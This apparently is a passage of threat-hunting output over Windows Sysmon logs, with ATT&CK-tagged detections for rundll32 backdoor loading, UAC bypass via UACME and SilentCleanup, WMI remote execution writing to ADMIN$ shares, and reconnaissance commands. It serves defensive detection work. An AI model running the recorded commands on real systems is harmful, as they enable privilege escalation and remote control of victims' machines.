SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342409 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:38.149 + 747F3D96-E922-5F33-0000-00107A2B0B00 + 6952 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\WOW6432Node\Npcap" /ve 2>nul | find "REG_SZ" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E90A-5F33-0000-0010863C0100 + 1740 + C:\Windows\System32\cmd.exe + C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5134 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 09:46:49.331 + 747F3D96-5809-5D45-0000-00100B233F00 + 1380 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe"\system32\cleanmgr.exe /autoclean /d C: + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4EA-5D45-0000-00105CD60000 + 1072 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.527 + 365ABB72-B181-5CC8-0000-00108DC71E00 + 692 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 422746 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-20 22:35:26.747 + 747F3D96-662E-5F8F-0000-001023353800 + 6748 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-E130-5F8F-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 840 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342408 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:36.545 + 747F3D96-E920-5F33-0000-001043920A00 + 5128 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E914-5F33-0000-001009990500 + 5144 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5133 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-08-03 09:46:48.842 + 747F3D96-5808-5D45-0000-0010D1FE3E00 + 1268 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-5808-5D45-0000-00106CDC3E00 + 924 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 34 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9839 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.512 + 365ABB72-B181-5CC8-0000-001023C41E00 + 1256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9829 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.356 + 365ABB72-B0F3-5CC8-0000-0010373E1D00 + 3328 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /all + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1046 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.152 + 365ABB72-4A01-5CE7-0000-00102DA1AC00 + 788 + C:\Windows\System32\net.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" /c net user + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549016 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-04 22:41:04.465 + 747F3D96-BB00-5FCA-0000-001033CD7600 + 8536 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-3407-5FCB-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.675 + 747F3D96-28B3-5E1E-0000-001032047C00 + 1656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,OpenURL ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578505 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:14.246 + 747F3D96-3A8A-607F-0000-0010E4717700 + 5280 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-82AF-607F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 612 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342407 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:05:16.721 + 747F3D96-E90C-5F33-0000-0010CB420200 + 3320 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E909-5F33-0000-00108C580000 + 612 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8048 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:21.539 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + C:\Users\IEUser\Desktop\invoke-pipeshell-master\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-6231-5CC7-0000-00104CF71800 + 3940 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9838 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:13.434 + 365ABB72-B181-5CC8-0000-0010ADBF1E00 + 3372 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9828 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.324 + 365ABB72-B0F3-5CC8-0000-0010C43A1D00 + 2828 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script 